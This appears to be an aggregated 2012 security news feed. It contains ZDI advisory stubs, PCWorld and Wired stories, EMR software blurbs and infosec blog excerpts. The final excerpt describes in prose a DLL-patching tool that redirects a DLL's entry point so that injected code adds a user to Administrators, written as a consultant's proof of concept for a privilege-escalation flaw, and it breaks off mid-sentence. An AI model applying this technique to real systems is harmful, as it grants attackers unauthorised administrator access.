==> ZDI-CAN-1582: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1577: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1473: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1433: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-08-21, 111 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1339: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-08-21, 111 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1590: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1587: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1568: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1536: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1535: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1528: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1527: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'James Burton' and 'Insomnia Security' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1513: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1512: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1511: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1501: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1468: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2011-12-22, 354 days ago. The vendor is given until 2012-06-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1480: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'gwslabs.com' was reported to the affected vendor on: 2011-12-19, 357 days ago. The vendor is given until 2012-06-16 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1437: Honeywell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-11-23, 383 days ago. The vendor is given until 2012-05-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1429: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'ptzool' was reported to the affected vendor on: 2011-11-04, 402 days ago. The vendor is given until 2012-05-02 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1322: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrzej Dyjak' was reported to the affected vendor on: 2011-10-28, 409 days ago. The vendor is given until 2012-04-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1383: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Alin Rad Pop' was reported to the affected vendor on: 2011-10-21, 416 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1347: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2011-10-21, 416 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1329: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2011-08-12, 486 days ago. The vendor is given until 2012-02-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Don’t fall for the Facebook privacy notice hoax

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Have you posted the notice to your Facebook timeline to proclaim your copyright ownership of all content? Have you seen others from your social network posting such a notice? If you haven't already, don't bother. It's a hoax. It's not even a new hoax. It's a resurgence of an old hoax that many users fell for earlier this year when Facebook became a publicly traded company. The previous hoax implied that the change from a private company to a public one somehow changed the rules of the privacy agreement and put your posts and photos at risk unless you posted a copy-and-paste disclaimer establishing your copyright ownership. You can't change the Facebook legal terms by posting on your timeline. The new one reads: "In response to the new Facebook guidelines I hereby declare that my copyright is attached to all of my personal details, illustrations, paintings, writing, publications, photos and videos, etc. (as a result of the Berne Convention)."

==> With shopping scams on the rise, watch for these threats

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Tomorrow is Thanksgiving, which means only one thing: the glorious chaos we call the Holiday Shopping Season will soon be upon us. Holiday shopping also means a spike in online scams, fraud, and malware, so you need to be aware of the risks and threats, and exercise some common sense to avoid a cyber-Grinch incident. Intrepid shoppers will line up for Black Friday deals that have spilled over to Thanksgiving Thursday. You can now start your Black Friday shopping between the turkey feast and the pumpkin pie, before the football games are even over on Thanksgiving Day. The definition of Friday aside, holiday shopping will officially be underway. Black Friday will be followed by Cyber Monday, and many shoppers will turn to their mobile devices to find great deals, so it's primetime for cybercriminals. Be careful what apps you install and what you click on from your mobile device.

Rising threat of mobile scams and malware

Black Friday is generally an in-person, brick-and-mortar-store shopping experience, but competition from online retailers and Cyber Monday, combined with the explosion of connected shoppers armed with mobile devices, has changed the game. A report from iovation, a mobile device security and reputation management company, claims that online retail transactions from mobile devices have increased 300 percent over last year. Mobile transactions accounted for nearly one in ten purchases in the most recent quarter, and that number is expected to spike up for holiday shopping.

==> US teens lead the way for shady, risky online behavior

http://feeds.pcworld.com/pcworld/blogs/security_alert/ What does your teen do when he or she is online? Do you know? Teens in general partake in riskier online behavior than your average user, but according to a recent study from McAfee, Exploring the Digital Divide, teens in the United States are even more likely to engage in shady online activities. The new report is a follow-up to McAfee's The Digital Divide: How the Online Behavior of Teens Is Getting Past Parents, released earlier this year. The original survey focused solely on the United States, but the new one expands the scope to include teens in European countries for comparison. The results might be a bit discouraging for parents of US teens. Teens in the United States lead in almost every category of shady online behavior. Nearly a third of US teens have used the Web to intentionally surf for bleep. US teens also lead in using mobile devices to cheat on tests, and are tied for second in using the Internet as a platform for cyber bullying, only half a percentage point behind the Netherlands. Go USA?

==> Here's how to secure your email and avoid becoming a ‘Petraeus’

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It was a shock when David Petraeus, a respected and highly decorated Army general, abruptly stepped down from his post as the director of the CIA earlier this week. It was even more of a jolt to learn that his resignation was due to an extramarital affair. But the real story might be the fact that the affair came to light more or less accidentally as a result of poor email and privacy practices. First, a little background on how things went down. The affair between David Petraeus and his biographer Paula Broadwell seems like something from the Showtime series Homeland, or perhaps a James Bond plot line, but the events that led to the FBI investigation that uncovered the affair are a bit more Fatal Attraction. Broadwell sent anonymous threatening emails to another woman she considered to be competition for Petraeus' affection, and that woman, Jill Kelley, initiated the investigation that eventually unraveled the affair and led to the downfall of one of this generation's greatest American heroes. I don't want to teach anyone how to cover their illicit tracks better, or how to have a more clandestine affair, but let's take a look at where Petraeus and Broadwell went wrong so you can understand how to cover your tracks better in general, and how to secure your email and protect your privacy online.

==> Out of date, vulnerable browsers put users at risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Is your browser up to date? According to the results of a new survey from Kaspersky, a security software vendor, nearly a quarter of the browsers currently in use are out of date. Surfing the Web with a vulnerable browser is a recipe for disaster. The Web browser has evolved to become the primary software used on many PCs. People access their email, surf websites, create documents and spreadsheets, access cloud-based file storage and sharing sites, and share with others on social networking sites, all through the browser. Attackers know this as well, which is why it is exceptionally risky to use a browser with known vulnerabilities. Kaspersky gathered anonymous data through its cloud-based Kaspersky Security Network. Kaspersky researchers analyzed the browser usage data from millions of customers around the world, and uncovered some concerning trends.

* 23 percent of browsers are not current: 14.5 percent are still using the previous version, while 8.5 percent are using even older, obsolete versions.
* When a new version of a browser is released, it can take nearly 10 days for it to surpass the previous version in usage, and an average of about a month for a majority of users to upgrade.

Keep your browser up to date to avoid Web-based attacks. The major browsers all have automatic update mechanisms in place. The easiest way to make sure your browser is current is to enable the automatic updates and let them do what they're meant to do: keep your browser up to date without requiring you to manage the process yourself.

==> Study finds 25 percent of Android apps to be a security risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to a new report from Bit9, a security vendor with a focus on defending against advanced persistent threats (APT), there is a one in four chance that downloading an Android app from the official Google Play market could put you at risk. Bit9 analyzed 400,000 or so apps in Google Play, and found over 100,000 it considers to be on the shady side. Does that mean that the sky is falling, and everyone with an Android smartphone or tablet should abandon it immediately? No. The research by Bit9 illustrates some issues with app development in general, and should raise awareness among mobile users to exercise some discretion when downloading and installing apps, but it's not a sign of any urgent crisis affecting Android apps. Use discretion rather than blindly granting permissions to apps. The report from Bit9 isn't about apps that contain malware, or are even overtly malicious for that matter. Bit9 reviewed the permissions requested by the apps, and examined the security and privacy implications of granting those permissions. The reality is that many apps request permission to access sensitive content they have no actual need for. Bit9 says that 72 percent of all Android apps in the Google Play market request access to at least one potentially risky permission. For example, 42 percent request access to GPS location data, 31 percent want access to phone number and phone call history, and 26 percent ask for permission to access personal information. Bit9 discovered 285 apps that use 25 or more system permissions.

==> Shamed by Mugshot Sites, Arrestees Try Novel Lawsuit

http://feeds.wired.com/wired27b Websites that host booking photos and charge hundreds of dollars to remove the mugshots are proliferating across the country, raking in fortunes from those wanting to keep their arrest and criminal records off search engines.

==> Supreme Court Asked to Review $222K Landmark File-Sharing Case

http://feeds.wired.com/wired27b Infamous file-sharer Jammie Thomas-Rasset asked the Supreme Court on Monday to review a jury's conclusion that she pay the recording industry $222,000 for downloading and sharing two dozen copyrighted songs on

==> Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

http://feeds.wired.com/wired27b Transit authorities in cities across the country are quietly installing microphone-enabled surveillance systems on public buses that would give them the ability to record and store private conversations. The

==> FTC Probing bleep’s Mobile Apps for Privacy Breaches

http://feeds.wired.com/wired27b The Obama administration said Monday it was investigating the mobile app space for bleep concerning privacy breaches of federal law that include the unauthorized collection and sharing of personal information. The

==> Feds Charge Anonymous Spokesperson for Sharing Hacked Stratfor Credit Cards

http://feeds.wired.com/wired27b A Dallas grand jury has brought charges against Anonymous spokesman Barrett Brown stemming from the 2011 hack of intelligence vendor Stratfor Global Intelligence. Brown isn't charged with committing the hack; just with possessing and transmitting credit card numbers that

==> Mailing Fake Anthrax Is Not Protected Speech, Court Says

http://feeds.wired.com/wired27b A California man convicted for mailing small packets of sugar marked as Anthrax to promote a book about the deadly toxin cannot rightfully claim he had a First Amendment right to carry out the 2008 campaign that had left

==> Washington Drops Defense of Online ‘Adult Services’ Law

http://feeds.wired.com/wired27b Washington state is halting its defense of a landmark law requiring online companies to

==> Hollywood’s Total Piracy Awareness Program Set for January Launch

http://feeds.wired.com/wired27b Beginning in a few weeks, the nation's major internet service providers will roll out an initiative, backed by Obama and pushed by Hollywood and the record labels, to disrupt and possibly terminate internet access

==> John McAfee Hospitalized in Guatemala

http://feeds.wired.com/wired27b John McAfee has been hospitalized in Guatemala to treat a possible heart attack, according to ABC's Matt Gutman. McAfee was detained by Guatemala's National Civil Police on Wednesday for entering the country illegally. John McAfee retained

==> Appeals Court Sides With Bush Wiretapping

http://feeds.wired.com/wired27b A federal appeals court is refusing to reconsider its August ruling in which it said the federal government may spy on Americans' communications without warrants and

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there's information available to help. The Best Web Hosts is a great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practice's server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditab's Intelligent Medical Software (IMS) combines features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthy's NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an office's current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKesson's Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Google's Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the Bay Area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpedaled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEye created has caused them to backpedal quite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know, I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even though it wasn’t a far fall - a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven’t blogged anything of good use lately so I thought I would start up again by calling out this completely useless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled “Share – Or Keep Getting Pwned”. Sigh. Clearly zero research was done into this posting as there really is a lot of [...]

==> Week 49 in Review – 2012

http://infosecevents.net/feed/ Event Related SANS SANS SEC642: Advanced Web App Penetration Testing and Ethical Hacking (review) – blog.c22.cc After taking a year off from SANS London (a trip to Colombia was too much to resist last year), I flew back over to sunny London (ha) to attend the new SEC642: Advanced Web App Penetration Testing class with [...]

==> Week 48 in Review – 2012

http://infosecevents.net/feed/ Event Related Hacker Internship – nds.ruhr-uni-bochum.de Web applications in the age of Web 2.0 are increasingly becoming the target of attackers. SQL injection compromises third-party databases without any trouble, XSS vulnerabilities steal browser sessions, and via cross-site request forgery you gain countless new friends in a social network from one day to the next. [...]

==> Week 47 in Review – 2012

http://infosecevents.net/feed/ Event Related DOAG 2012: Best of Oracle Security 2012 – blog.red-database-security.com Yesterday I gave a presentation Best of Oracle Security 2012 at the DOAG 2012 conference in Nürnberg. Resources cfbackdoor – gironsec.com This is a text file. Tools Util Util – Windows Handles Viewer (Simple GUI with REPL) v1.0.exe – diniscruz.blogspot.com Based on the Util [...]

==> Week 46 in Review – 2012

http://infosecevents.net/feed/ Resources VulnVoIP (Vulnerable VoIP) – The Fundamentals of VoIP Hacking – rebootuser.com VulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail. Owning Computers Without Shell Access – accuvant.com What's This All [...]

==> Week 45 in Review – 2012

http://infosecevents.net/feed/ Event Related OWASP OWASP AppSec 2012 Presentation: SQL Server Exploitation, Escalation, and Pilfering – netspi.com During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. XSS & CSRF with HTML5 – Attack, Exploit and Defense – shreeraj.blogspot.com HTML5 [...]

==> Week 44 in Review – 2012

http://infosecevents.net/feed/ Event Related Hashdays Hashdays Wrap-up Day #1 – blog.rootshell.be I'm in Luzern for a few days but the Hashdays security conference started today! w00t! This is the first edition for me. A very nice opening session performed by the defcon-switzerland group which organises this event. Hashdays Wrap-Up Day #2 – blog.rootshell.be Yesterday evening, I went [...]

==> Information Security Events For November

http://infosecevents.net/feed/ Here are information security events in North America this month: Hackfest: November 2 to 3 in Quebec, Canada; BSides DFW: November 3 in Dallas, Texas USA; Cloud Security Alliance Congress: November 7 and 8 in Florida, USA; PhreakNIC: November 9 to 11 in Tennessee, USA; Bsides [...]

==> Week 43 in Review – 2012

http://infosecevents.net/feed/ Event Related ToorCon ToorChat – github.com A Chat Program for use with the ToorCon 2013 badge. ToorCon Presentation – brightmoonsecurity.com Thanks for attending my Toorcon Presentation. Below are links to my presentation and the references I mentioned in the talk. Please let me know if you have any recommendations on course materials. ToorCon Presentation – [...]

==> Week 42 in Review – 2012

http://infosecevents.net/feed/ Event Related Ruxcon Breakpoint Ruxcon Breakpoint kicks off with a bang – risky.biz The inaugural Ruxcon Breakpoint security conference has kicked off with a bang in Melbourne. Pacemakers, defibrillators open to attack (The Register) – risky.biz The researcher in question, Barnaby Jack, today told the Ruxcon Breakpoint security conference in Melbourne, Australia that the most [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the [...]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes an excellent point in the article, “we’ve grown to [...]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his [...]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily [...]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows [...]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I [...]

==> Who needs employee exit procedures and disaster recovery plans are for wimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the [...]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The [...]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and I enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there. Information Security: From Ineffective to Innovative Arthur [...]

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched-in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched-in code relies on the function NetLocalGroupAddMembers(...) from 